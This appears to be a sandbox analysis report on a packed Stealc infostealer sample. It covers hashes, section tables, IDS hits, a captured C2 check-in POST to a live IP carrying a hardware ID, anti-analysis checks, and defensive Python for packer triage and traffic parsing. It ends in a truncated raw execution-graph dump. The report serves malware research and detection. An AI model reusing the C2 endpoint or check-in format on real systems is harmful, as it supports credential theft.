• Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe
• Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Report size getting too big, too many NtQueryValueKey calls found.
• VT rate limit hit for: file.exe
                                      No simulations
Match | Associated Sample Name / URL | Detection | Threat Name | Context
185.215.113.206 | file.exe, ten earlier submissions | malicious in every case | Stealc, Vidar (5 submissions) and Stealc (5 submissions) | 185.215.113.206/6c4adf523b719729.php in every case (SHA-256 and report links omitted)
                                      No context
Match | Associated Sample Name / URL | Detection | Threat Name | Context
WHOLESALECONNECTIONSNL | file.exe, ten earlier submissions | malicious in every case | LummaC (5 submissions), Stealc, Vidar (3 submissions), Stealc (2 submissions) | 185.215.113.16 for the LummaC submissions, 185.215.113.206 for the Stealc and Stealc, Vidar submissions (SHA-256 and report links omitted)
                                      No context
                                      No context
                                      No created / dropped files found
File type: PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit): 7.9623972805857175
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: file.exe
File size: 2'114'560 bytes
MD5: ddaa0462b7b18caecc3dac2c4b87dd91
SHA1: 356ec8395b16445164e12c0b238f7fd1af7168bf
SHA256: 5026b4a52abc821ed17b10cbe59d4ec4c0a8131d1736dfb89d1e568abee5ab27
SHA512: 5a29fd2652cfafe187bc65bf78672d47b57724e7352f3a62080c6f190102198a251a65372465053ecfa39266902c6a4f496cd4fd130638d0455a872ee6f17516
SSDEEP: 49152:oQlj3CKeWHNWyFklofB6sICX2c8uioFkgJb:Vl2SNDFkUNX2c8uLFF
TLSH: 88A533144E02CC3EC56A66B50B87703A7F7D6E8461CFCB659183D25BAC22BF9C0D7A94
File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........b.}.............u^......uk......u_......{v.....fz./.....{f..............uZ......uh.....Rich....................PE..L...8n.g...
Icon Hash: 00928e8e8686b000
Entrypoint: 0xb24000 (RVA 0x724000 at the static image base)
Entrypoint Section: .taggant
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics: DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp: 0x671E6E38 [Sun Oct 27 16:45:44 2024 UTC]
TLS Callbacks: (none; the TLS data directory is empty)
CLR (.Net) Version: (none; the COM descriptor directory is empty)
OS Version Major: 5
OS Version Minor: 1
File Version Major: 5
File Version Minor: 1
Subsystem Version Major: 5
Subsystem Version Minor: 1
Import Hash: 2eabe9054cad5152567f0699947a2c5b
Entrypoint disassembly (first instruction):
jmp 00007FE478E065CAh
Programming Language (compiler stamps from the Rich header):
• [C++] VS2010 build 30319
• [ASM] VS2010 build 30319
• [ C ] VS2010 build 30319
• [ C ] VS2008 SP1 build 30729
• [IMP] VS2008 SP1 build 30729
• [LNK] VS2010 build 30319
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x2e9050 | 0x64 | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x2e91f8 | 0x8 | .idata
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
(unnamed) | 0x1000 | 0x2e7000 | 0x67600 | b6cc732d2f2f27d5e4075e5f95f357a2 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x2e8000 | 0x1000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata | 0x2e9000 | 0x1000 | 0x200 | 049071433b9f7c843453337b0fd53002 | False | 0.1328125 | data | 0.8946074494647072 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
(unnamed) | 0x2ea000 | 0x29f000 | 0x200 | 7ac162d0921a27e13cf3c7b57c9fe406 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
uwjugjop | 0x589000 | 0x19a000 | 0x199400 | dbb1cd181adc433e24cc1f22a8c111cc | False | 0.9949328516340867 | data | 7.954930904416413 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
radqkvcl | 0x723000 | 0x1000 | 0x400 | 07f3d3a084a2d998e990c377aa2c7a3f | False | 0.755859375 | data | 6.013278502620796 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant | 0x724000 | 0x3000 | 0x2200 | 088a8e2c3b035fd998ea1baa7ac18b70 | False | 0.09731158088235294 | DOS executable (COM) | 1.0986259403937138 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Reading the table: the entry point 0xb24000 (RVA 0x724000) lies at the start of .taggant, not in a .text section. Five of the seven sections are writable and executable, two have empty names, and the two unnamed sections reserve 0x2e7000 and 0x29f000 bytes of virtual space against only 0x67600 and 0x200 bytes on disk, which is where a packer stub typically unpacks its payload. uwjugjop, at 0x199400 raw bytes and an entropy of 7.95, holds most of the file and is the compressed or encrypted payload.
DLL | Import
kernel32.dll | lstrcpy
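The section table and the one-function import table above are the static packer indicators an analyst checks first. The Python below is an added example written for this page; it is not Joe Sandbox code and not code from the sample or its packer. Because the binary itself is not part of the report, the example reconstructs the seven IMAGE_SECTION_HEADER records from the values the report lists (entropy figures are copied from the report rather than computed), packs them with struct into the real 40-byte on-disk layout, parses them back, maps the entry point 0xb24000 to its section and lists the indicators: RWX sections, empty names, virtual sizes far larger than raw sizes, a high-entropy section, an entry point outside a code section and an import table of one function. The synthesised PointerToRawData values, the 4x virtual/raw threshold and the 7.0 entropy threshold are assumptions of the example.

```python
"""Static packer triage over the section table of file.exe.

Added example for this report; it is not Joe Sandbox output and not code
from the sample or its packer.  The sample is not embedded, so the section
records below are constructed from the values the report lists (RVA,
virtual size, raw size, characteristics, entropy) and packed into real
40-byte IMAGE_SECTION_HEADER entries; the parser then works on those bytes
exactly as it would on the section table read out of the file.
"""
import struct

# IMAGE_SECTION_HEADER characteristic bits (winnt.h)
IMAGE_SCN_CNT_CODE = 0x00000020
IMAGE_SCN_CNT_INITIALIZED_DATA = 0x00000040
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000
IMAGE_SCN_MEM_WRITE = 0x80000000
RWX = IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_WRITE

IDATA_RWX = IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_READ | RWX
IDATA_RW = IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE

# (name, VirtualAddress, VirtualSize, SizeOfRawData, Characteristics), as reported
REPORTED_SECTIONS = [
    (b"", 0x001000, 0x2e7000, 0x067600, IDATA_RWX),
    (b".rsrc", 0x2e8000, 0x001000, 0x000000, IDATA_RW),
    (b".idata", 0x2e9000, 0x001000, 0x000200, IDATA_RW),
    (b"", 0x2ea000, 0x29f000, 0x000200, IDATA_RWX),
    (b"uwjugjop", 0x589000, 0x19a000, 0x199400, IDATA_RWX),
    (b"radqkvcl", 0x723000, 0x001000, 0x000400, IDATA_RWX),
    (b".taggant", 0x724000, 0x003000, 0x002200, IDATA_RWX),
]
# Entropy per section as reported ("unknown" for the two unnamed sections)
REPORTED_ENTROPY = {b".rsrc": 0.0, b".idata": 0.89, b"uwjugjop": 7.95,
                    b"radqkvcl": 6.01, b".taggant": 1.10}
IMAGE_BASE = 0x400000
ENTRY_POINT_VA = 0xB24000   # "Entrypoint" in the report
IMPORT_COUNT = 1            # kernel32.dll!lstrcpy is the whole import table

SECTION_HDR = struct.Struct("<8sIIIIIIHHI")   # 40 bytes per section header


def build_section_table(sections):
    """Pack the tuples as IMAGE_SECTION_HEADER records.  PointerToRawData is
    synthesised (assumption) by laying raw sections out back to back from 0x400."""
    out, raw_ptr = bytearray(), 0x400
    for name, rva, vsize, raw, flags in sections:
        out += SECTION_HDR.pack(name, vsize, rva, raw, raw_ptr, 0, 0, 0, 0, flags)
        raw_ptr += raw
    return bytes(out)


def parse_section_table(blob, count):
    """Unpack `count` IMAGE_SECTION_HEADER records into dicts."""
    secs = []
    for i in range(count):
        name, vsize, rva, raw, _rawptr, _, _, _, _, flags = SECTION_HDR.unpack_from(
            blob, i * SECTION_HDR.size)
        secs.append({"name": name.rstrip(b"\0"), "rva": rva, "vsize": vsize,
                     "raw": raw, "flags": flags})
    return secs


def section_for_rva(secs, rva):
    """Section whose mapped range covers `rva`, or None (headers, gaps)."""
    for s in secs:
        if s["rva"] <= rva < s["rva"] + max(s["vsize"], s["raw"]):
            return s
    return None


def triage(secs, entry_va, image_base, import_count, entropy):
    """Collect the packer indicators an analyst would list for this header."""
    findings = []
    ep = section_for_rva(secs, entry_va - image_base)
    ep_name = ep["name"].decode("ascii", "replace") if ep else "<no section>"
    if ep_name not in (".text", "CODE"):
        findings.append(f"entry point 0x{entry_va:x} lies in {ep_name!r}, not in a code section")
    for s in secs:
        label = s["name"].decode("ascii", "replace") or "<unnamed>"
        if s["flags"] & RWX == RWX:
            findings.append(f"{label}: writable and executable")
        if s["flags"] & IMAGE_SCN_MEM_EXECUTE and not s["flags"] & IMAGE_SCN_CNT_CODE:
            findings.append(f"{label}: executable but not marked IMAGE_SCN_CNT_CODE")
        if not s["name"]:
            findings.append(f"<unnamed>: empty section name at RVA 0x{s['rva']:x}")
        if s["vsize"] >= 0x10000 and s["vsize"] >= 4 * max(s["raw"], 1):
            findings.append(f"{label}: virtual size 0x{s['vsize']:x} far exceeds raw size "
                            f"0x{s['raw']:x} (room reserved for unpacked code)")
        if entropy.get(s["name"], 0.0) > 7.0:
            findings.append(f"{label}: entropy {entropy[s['name']]:.2f}, compressed or encrypted")
    if import_count <= 2:
        findings.append(f"only {import_count} import(s): APIs are resolved at runtime")
    return findings


if __name__ == "__main__":
    table = build_section_table(REPORTED_SECTIONS)
    parsed = parse_section_table(table, len(REPORTED_SECTIONS))
    for line in triage(parsed, ENTRY_POINT_VA, IMAGE_BASE, IMPORT_COUNT, REPORTED_ENTROPY):
        print(line)
```

On a real file the same parser applies to the bytes at e_lfanew + 24 + SizeOfOptionalHeader, where NumberOfSections records of 40 bytes follow the optional header; entropy would then be computed over each section's raw bytes instead of copied from the report.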
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-10-28T23:48:09.074209+0100 | 2044243 | ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in | 1 | 192.168.2.6 | 49711 | 185.215.113.206 | 80 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 28, 2024 23:48:07.874202013 CET | 49711 | 80 | 192.168.2.6 | 185.215.113.206
Oct 28, 2024 23:48:07.879586935 CET | 80 | 49711 | 185.215.113.206 | 192.168.2.6
Oct 28, 2024 23:48:07.879733086 CET | 49711 | 80 | 192.168.2.6 | 185.215.113.206
Oct 28, 2024 23:48:07.880403042 CET | 49711 | 80 | 192.168.2.6 | 185.215.113.206
Oct 28, 2024 23:48:07.886178017 CET | 80 | 49711 | 185.215.113.206 | 192.168.2.6
Oct 28, 2024 23:48:08.785053968 CET | 80 | 49711 | 185.215.113.206 | 192.168.2.6
Oct 28, 2024 23:48:08.785229921 CET | 49711 | 80 | 192.168.2.6 | 185.215.113.206
Oct 28, 2024 23:48:08.788475990 CET | 49711 | 80 | 192.168.2.6 | 185.215.113.206
Oct 28, 2024 23:48:08.793850899 CET | 80 | 49711 | 185.215.113.206 | 192.168.2.6
Oct 28, 2024 23:48:09.073993921 CET | 80 | 49711 | 185.215.113.206 | 192.168.2.6
Oct 28, 2024 23:48:09.074208975 CET | 49711 | 80 | 192.168.2.6 | 185.215.113.206
Oct 28, 2024 23:48:14.227246046 CET | 80 | 49711 | 185.215.113.206 | 192.168.2.6
Oct 28, 2024 23:48:14.227340937 CET | 49711 | 80 | 192.168.2.6 | 185.215.113.206
Oct 28, 2024 23:48:15.024122000 CET | 49711 | 80 | 192.168.2.6 | 185.215.113.206
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.6 | 49711 | 185.215.113.206 | 80 | 5912 | C:\Users\user\Desktop\file.exe
Timestamp | Bytes transferred | Direction | Data

Oct 28, 2024 23:48:07.880403042 CET | 90 | OUT
GET / HTTP/1.1
Host: 185.215.113.206
Connection: Keep-Alive
Cache-Control: no-cache

Oct 28, 2024 23:48:08.785053968 CET | 203 | IN
HTTP/1.1 200 OK
Date: Mon, 28 Oct 2024 22:48:08 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

Oct 28, 2024 23:48:08.788475990 CET | 413 | OUT
POST /6c4adf523b719729.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----JECBGCFHCFIDHIDHDGDG
Host: 185.215.113.206
Content-Length: 211
Connection: Keep-Alive
Cache-Control: no-cache
Data Raw: 2d 2d 2d 2d 2d 2d 4a 45 43 42 47 43 46 48 43 46 49 44 48 49 44 48 44 47 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 34 37 30 33 31 41 44 44 34 31 45 32 36 34 33 30 39 35 39 34 32 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 43 42 47 43 46 48 43 46 49 44 48 49 44 48 44 47 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 74 61 6c 65 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 43 42 47 43 46 48 43 46 49 44 48 49 44 48 44 47 44 47 2d 2d 0d 0a
Data Ascii (CRLF line breaks restored from the raw bytes):
------JECBGCFHCFIDHIDHDGDG
Content-Disposition: form-data; name="hwid"

B47031ADD41E2643095942
------JECBGCFHCFIDHIDHDGDG
Content-Disposition: form-data; name="build"

tale
------JECBGCFHCFIDHIDHDGDG--

Oct 28, 2024 23:48:09.073993921 CET | 210 | IN
HTTP/1.1 200 OK
Date: Mon, 28 Oct 2024 22:48:08 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 8
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Data Raw: 59 6d 78 76 59 32 73 3d
Data Ascii: YmxvY2s= (base64; decodes to the ASCII string "block")
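The two requests above are the whole of the C2 conversation the sandbox captured: an empty GET / that the server answers with a zero-length 200, then a multipart POST to /6c4adf523b719729.php carrying a hwid and a build name, answered with eight bytes of base64 that decode to the word block, after which the capture shows no further HTTP traffic before the session closes. The Python below is an added example written for this page; it is not Joe Sandbox, SEKOIA or Stealc code. It rebuilds the POST and the reply byte for byte from the Data Raw hex in the report (211 bytes of body, 413 bytes for the whole request), splits the HTTP message, parses the multipart body with a minimal framing parser, decodes the reply strictly, and ends with a shape check that records only what this one capture shows: a POST to a .php path, a boundary of four dashes plus twenty letters from A to J, and exactly the fields hwid and build. That shape check is an observation from a single sample, not the content of ET rule 2044243, which the example does not reproduce.

```python
"""Parse the Stealc check-in captured above and decode the C2 reply.

Added example for this report: not Joe Sandbox output and not Stealc code.
Request and reply are constructed byte for byte from the "Data Raw" hex
printed for session 0, so the parser sees exactly what crossed the wire.
The shape check at the end uses only traits visible in this one capture.
"""
import base64
import re

BOUNDARY = b"----JECBGCFHCFIDHIDHDGDG"
REQUEST_HEADERS = b"".join([            # constructed from the report
    b"POST /6c4adf523b719729.php HTTP/1.1\r\n",
    b"Content-Type: multipart/form-data; boundary=" + BOUNDARY + b"\r\n",
    b"Host: 185.215.113.206\r\n",
    b"Content-Length: 211\r\n",
    b"Connection: Keep-Alive\r\n",
    b"Cache-Control: no-cache\r\n",
    b"\r\n",
])
REQUEST_BODY = b"".join([               # the 211-byte multipart body
    b"--" + BOUNDARY + b"\r\n",
    b'Content-Disposition: form-data; name="hwid"\r\n\r\n',
    b"B47031ADD41E2643095942\r\n",
    b"--" + BOUNDARY + b"\r\n",
    b'Content-Disposition: form-data; name="build"\r\n\r\n',
    b"tale\r\n",
    b"--" + BOUNDARY + b"--\r\n",
])
RESPONSE_BODY = bytes.fromhex("59 6d 78 76 59 32 73 3d")   # the 8-byte reply


def split_http(raw):
    """Split one HTTP message into (start line, {header: value}, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.split(b"\r\n")
    headers = {}
    for line in lines[1:]:
        key, _, value = line.partition(b":")
        headers[key.strip().decode().lower()] = value.strip().decode()
    return lines[0].decode(), headers, body


def boundary_from_content_type(content_type):
    """Boundary parameter of a multipart/form-data Content-Type, or None."""
    m = re.search(r'boundary="?([^";]+)"?', content_type)
    return m.group(1).encode() if m else None


def parse_multipart(body, boundary):
    """Minimal multipart/form-data framing parser: {field name: value bytes}.
    Raises ValueError on broken framing; stops at the closing delimiter."""
    fields = {}
    for part in body.split(b"--" + boundary)[1:]:
        if part.startswith(b"--"):                     # "--boundary--" closes the body
            break
        if not part.startswith(b"\r\n"):
            raise ValueError("delimiter not followed by CRLF")
        part_headers, sep, value = part[2:].partition(b"\r\n\r\n")
        if not sep:
            raise ValueError("part has no header/body separator")
        m = re.search(rb'name="([^"]*)"', part_headers)
        if m:
            fields[m.group(1).decode()] = value[:-2] if value.endswith(b"\r\n") else value
    return fields


def decode_reply(body):
    """The C2 answers in base64; decode strictly so junk is not silently accepted."""
    return base64.b64decode(body, validate=True).decode("ascii")


def summarize_check_in(request_raw, response_body):
    """What the sample told the C2 (hwid, build) and what it got back."""
    start_line, headers, body = split_http(request_raw)
    if int(headers.get("content-length", -1)) != len(body):
        raise ValueError("Content-Length does not match body length")
    fields = parse_multipart(body, boundary_from_content_type(headers["content-type"]))
    return {"path": start_line.split()[1], "hwid": fields["hwid"].decode(),
            "build": fields["build"].decode(), "reply": decode_reply(response_body)}


def matches_observed_checkin_shape(request_raw):
    """POST to a .php path, boundary of four dashes plus 20 letters A-J, and a
    body with exactly the fields hwid and build: the traits of this capture.
    Derived from one sample; a starting point for a rule, not a rule."""
    start_line, headers, body = split_http(request_raw)
    method, path = (start_line.split() + ["", ""])[:2]
    boundary = boundary_from_content_type(headers.get("content-type", ""))
    if method != "POST" or not path.endswith(".php") or not boundary:
        return False
    if not re.fullmatch(rb"----[A-J]{20}", boundary):
        return False
    try:
        return set(parse_multipart(body, boundary)) == {"hwid", "build"}
    except ValueError:
        return False
```

summarize_check_in(REQUEST_HEADERS + REQUEST_BODY, RESPONSE_BODY) returns the path, the hwid B47031ADD41E2643095942, the build name tale and the decoded reply block; the Content-Length check and the strict base64 decode are there so that a truncated capture or a non-base64 reply fails loudly instead of producing a misleading summary.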


Target ID: 0
Start time: 18:48:02
Start date: 28/10/2024
Path: C:\Users\user\Desktop\file.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\file.exe"
Imagebase: 0x970000
File size: 2'114'560 bytes
MD5 hash: DDAA0462B7B18CAECC3DAC2C4B87DD91
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2240538270.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
• Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.2153163203.00000000053C0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2241492320.00000000017FE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation: low
Has exited: true


Execution Graph

Execution Coverage: 3%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 3.5%
Total number of Nodes: 1327
Total number of Limit Nodes: 24
execution_graph: the interactive node listing (1327 nodes) is omitted. API call chains recoverable from the executed path, by function address:
• 989aa0 GetPEB, then 989de3 LoadLibraryA (five calls) followed by a run of GetProcAddress calls: the single-entry import table is completed at runtime
• 974610 (RtlAllocateHeap, VirtualProtect) called repeatedly from 9722a0 and 9726f0 before any of the checks below run
• 971160 GetSystemInfo, 971110 GetCurrentProcess and VirtualAllocExNuma, 9710a0 VirtualAlloc and VirtualFree, 988b40 GlobalMemoryStatusEx followed by __aulldiv: each has a branch into ExitProcess
• 986a10 GetUserDefaultLangID with five separate ExitProcess branches (the locale check listed among the signatures)
• 986bc0 GetSystemTime, sscanf, SystemTimeToFileTime (twice), then a branch into ExitProcess
• 986d62 OpenEventA: on one path CreateEventA, on the other CloseHandle, Sleep and a loop back; a further path ends in CloseHandle, ExitProcess
• 9879e0 and 987a70 GetProcessHeap, RtlAllocateHeap, GetUserNameA and GetComputerNameA (one ExitProcess branch after the GetUserNameA call); 987690 GetWindowsDirectoryA; 980fc0 StrCmpCA (three calls), lstrlen, lstrcpy; 98acc0, 98aab0 and 98abb0 lstrlen, lstrcpy and lstrcat string builders
• Subtrees the sandbox summarises only by size: 981c60 (115 API calls), 9808a0 (289 API calls), 971ec0 (59 API calls), 977770 (109 API calls), 9849d0 (88 API calls), repeated 9759b0 (34 API calls) and others
37937->37938 37939 974610 2 API calls 37938->37939 37940 972e89 37939->37940 37941 974610 2 API calls 37940->37941 37942 972ea2 37941->37942 37943 974610 2 API calls 37942->37943 37944 972ebb 37943->37944 37945 974610 2 API calls 37944->37945 37946 972ed4 37945->37946 37947 974610 2 API calls 37946->37947 37948 972eed 37947->37948 37949 974610 2 API calls 37948->37949 37950 972f06 37949->37950 37951 974610 2 API calls 37950->37951 37952 972f1f 37951->37952 37953 974610 2 API calls 37952->37953 37954 972f38 37953->37954 37955 974610 2 API calls 37954->37955 37956 972f51 37955->37956 37957 974610 2 API calls 37956->37957 37958 972f6a 37957->37958 37959 974610 2 API calls 37958->37959 37960 972f83 37959->37960 37961 974610 2 API calls 37960->37961 37962 972f9c 37961->37962 37963 974610 2 API calls 37962->37963 37964 972fb5 37963->37964 37965 974610 2 API calls 37964->37965 37966 972fce 37965->37966 37967 974610 2 API calls 37966->37967 37968 972fe7 37967->37968 37969 974610 2 API calls 37968->37969 37970 973000 37969->37970 37971 974610 2 API calls 37970->37971 37972 973019 37971->37972 37973 974610 2 API calls 37972->37973 37974 973032 37973->37974 37975 974610 2 API calls 37974->37975 37976 97304b 37975->37976 37977 974610 2 API calls 37976->37977 37978 973064 37977->37978 37979 974610 2 API calls 37978->37979 37980 97307d 37979->37980 37981 974610 2 API calls 37980->37981 37982 973096 37981->37982 37983 974610 2 API calls 37982->37983 37984 9730af 37983->37984 37985 974610 2 API calls 37984->37985 37986 9730c8 37985->37986 37987 974610 2 API calls 37986->37987 37988 9730e1 37987->37988 37989 974610 2 API calls 37988->37989 37990 9730fa 37989->37990 37991 974610 2 API calls 37990->37991 37992 973113 37991->37992 37993 974610 2 API calls 37992->37993 37994 97312c 37993->37994 37995 974610 2 API calls 37994->37995 37996 973145 37995->37996 37997 974610 2 API calls 37996->37997 37998 97315e 37997->37998 37999 974610 2 API calls 37998->37999 38000 973177 37999->38000 
38001 974610 2 API calls 38000->38001 38002 973190 38001->38002 38003 974610 2 API calls 38002->38003 38004 9731a9 38003->38004 38005 974610 2 API calls 38004->38005 38006 9731c2 38005->38006 38007 974610 2 API calls 38006->38007 38008 9731db 38007->38008 38009 974610 2 API calls 38008->38009 38010 9731f4 38009->38010 38011 974610 2 API calls 38010->38011 38012 97320d 38011->38012 38013 974610 2 API calls 38012->38013 38014 973226 38013->38014 38015 974610 2 API calls 38014->38015 38016 97323f 38015->38016 38017 974610 2 API calls 38016->38017 38018 973258 38017->38018 38019 974610 2 API calls 38018->38019 38020 973271 38019->38020 38021 974610 2 API calls 38020->38021 38022 97328a 38021->38022 38023 974610 2 API calls 38022->38023 38024 9732a3 38023->38024 38025 974610 2 API calls 38024->38025 38026 9732bc 38025->38026 38027 974610 2 API calls 38026->38027 38028 9732d5 38027->38028 38029 974610 2 API calls 38028->38029 38030 9732ee 38029->38030 38031 974610 2 API calls 38030->38031 38032 973307 38031->38032 38033 974610 2 API calls 38032->38033 38034 973320 38033->38034 38035 974610 2 API calls 38034->38035 38036 973339 38035->38036 38037 974610 2 API calls 38036->38037 38038 973352 38037->38038 38039 974610 2 API calls 38038->38039 38040 97336b 38039->38040 38041 974610 2 API calls 38040->38041 38042 973384 38041->38042 38043 974610 2 API calls 38042->38043 38044 97339d 38043->38044 38045 974610 2 API calls 38044->38045 38046 9733b6 38045->38046 38047 974610 2 API calls 38046->38047 38048 9733cf 38047->38048 38049 974610 2 API calls 38048->38049 38050 9733e8 38049->38050 38051 974610 2 API calls 38050->38051 38052 973401 38051->38052 38053 974610 2 API calls 38052->38053 38054 97341a 38053->38054 38055 974610 2 API calls 38054->38055 38056 973433 38055->38056 38057 974610 2 API calls 38056->38057 38058 97344c 38057->38058 38059 974610 2 API calls 38058->38059 38060 973465 38059->38060 38061 974610 2 API calls 38060->38061 38062 97347e 38061->38062 38063 974610 2 
API calls 38062->38063 38064 973497 38063->38064 38065 974610 2 API calls 38064->38065 38066 9734b0 38065->38066 38067 974610 2 API calls 38066->38067 38068 9734c9 38067->38068 38069 974610 2 API calls 38068->38069 38070 9734e2 38069->38070 38071 974610 2 API calls 38070->38071 38072 9734fb 38071->38072 38073 974610 2 API calls 38072->38073 38074 973514 38073->38074 38075 974610 2 API calls 38074->38075 38076 97352d 38075->38076 38077 974610 2 API calls 38076->38077 38078 973546 38077->38078 38079 974610 2 API calls 38078->38079 38080 97355f 38079->38080 38081 974610 2 API calls 38080->38081 38082 973578 38081->38082 38083 974610 2 API calls 38082->38083 38084 973591 38083->38084 38085 974610 2 API calls 38084->38085 38086 9735aa 38085->38086 38087 974610 2 API calls 38086->38087 38088 9735c3 38087->38088 38089 974610 2 API calls 38088->38089 38090 9735dc 38089->38090 38091 974610 2 API calls 38090->38091 38092 9735f5 38091->38092 38093 974610 2 API calls 38092->38093 38094 97360e 38093->38094 38095 974610 2 API calls 38094->38095 38096 973627 38095->38096 38097 974610 2 API calls 38096->38097 38098 973640 38097->38098 38099 974610 2 API calls 38098->38099 38100 973659 38099->38100 38101 974610 2 API calls 38100->38101 38102 973672 38101->38102 38103 974610 2 API calls 38102->38103 38104 97368b 38103->38104 38105 974610 2 API calls 38104->38105 38106 9736a4 38105->38106 38107 974610 2 API calls 38106->38107 38108 9736bd 38107->38108 38109 974610 2 API calls 38108->38109 38110 9736d6 38109->38110 38111 974610 2 API calls 38110->38111 38112 9736ef 38111->38112 38113 974610 2 API calls 38112->38113 38114 973708 38113->38114 38115 974610 2 API calls 38114->38115 38116 973721 38115->38116 38117 974610 2 API calls 38116->38117 38118 97373a 38117->38118 38119 974610 2 API calls 38118->38119 38120 973753 38119->38120 38121 974610 2 API calls 38120->38121 38122 97376c 38121->38122 38123 974610 2 API calls 38122->38123 38124 973785 38123->38124 38125 974610 2 API calls 
